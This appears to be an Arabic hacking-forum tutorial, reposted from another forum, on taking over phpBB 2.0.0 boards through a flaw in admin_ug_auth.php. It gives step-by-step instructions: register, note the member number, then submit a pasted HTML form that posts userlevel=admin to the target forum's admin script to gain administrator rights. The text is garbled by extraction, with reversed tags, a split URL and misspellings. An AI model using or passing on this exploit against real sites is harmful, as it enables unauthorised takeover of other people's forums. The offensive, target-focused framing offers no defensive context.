" phpbb 2.0.0 ‫" اختتراق منتديات‬

                                                                      <‫>منقول من منتديات رواد العرب‬

                                                                                       phpbb 2.0.0

                                                                                      vb ‫وهو شبيه بالـ‬

                                                                           ‫وهو سهل جهدا بل يعتبر تصااافه‬

                                                                                          ‫يال سمو بال‬

                                                                                            PhpBB2
                                                                  admin_ug_auth.php ‫في ملف‬

                                                                                               :‫الوصف‬
                  ‫م على المنتدى‬.‫يمكنك من ختلل هذه الثغرة أن تصأختذ تصصريح بأن تصكون مدير والمشرف العا‬

                                                         ‫وبذلك يمكنك الدختول الى لوحة التحكم متى شئت‬
                                                                                               :‫الصدار‬
                                                                                                 2.0.0

                                                                       ‫لتجربة الثغرة اول سجل بالمنتدى‬
                                                                         ‫ثم احفظ رقم عضويتك بالمنتدى‬

                                                                   ‫بعدها افتح المفكرة وانسخ مايلي اليها‬

                                                                                             <html>
                                                                                             <head>
                                                                                            <head/>
                                                                                             <body>

                                                                        "form method="post>
action="http://www.domain_name/board_directory/admin/admin_ug_aut

                                                                                            <"h.php
                                                <"User Level: <select name="userlevel
                                   <option value="admin">Administrator</option>
                                      <option value="user">User</option></select>
                             <"input type="hidden" name="private[1]" value="0>
                        <"input type="hidden" name="moderator[1]" value="0>
                              <"input type="hidden" name="mode" value="user>
                                       <""=input type="hidden" name="adv" value>
                          <"User Number: <input type="text" name="u" size="5
                        <"input type="submit" name="submit" value="Submit>

                                                                                            <form/>
                                                                                            <body/>
                                                                                             <html/>

                                                           ‫عدل هذا العنوان الى عنوان الموقع المستهدف‬

                                                 330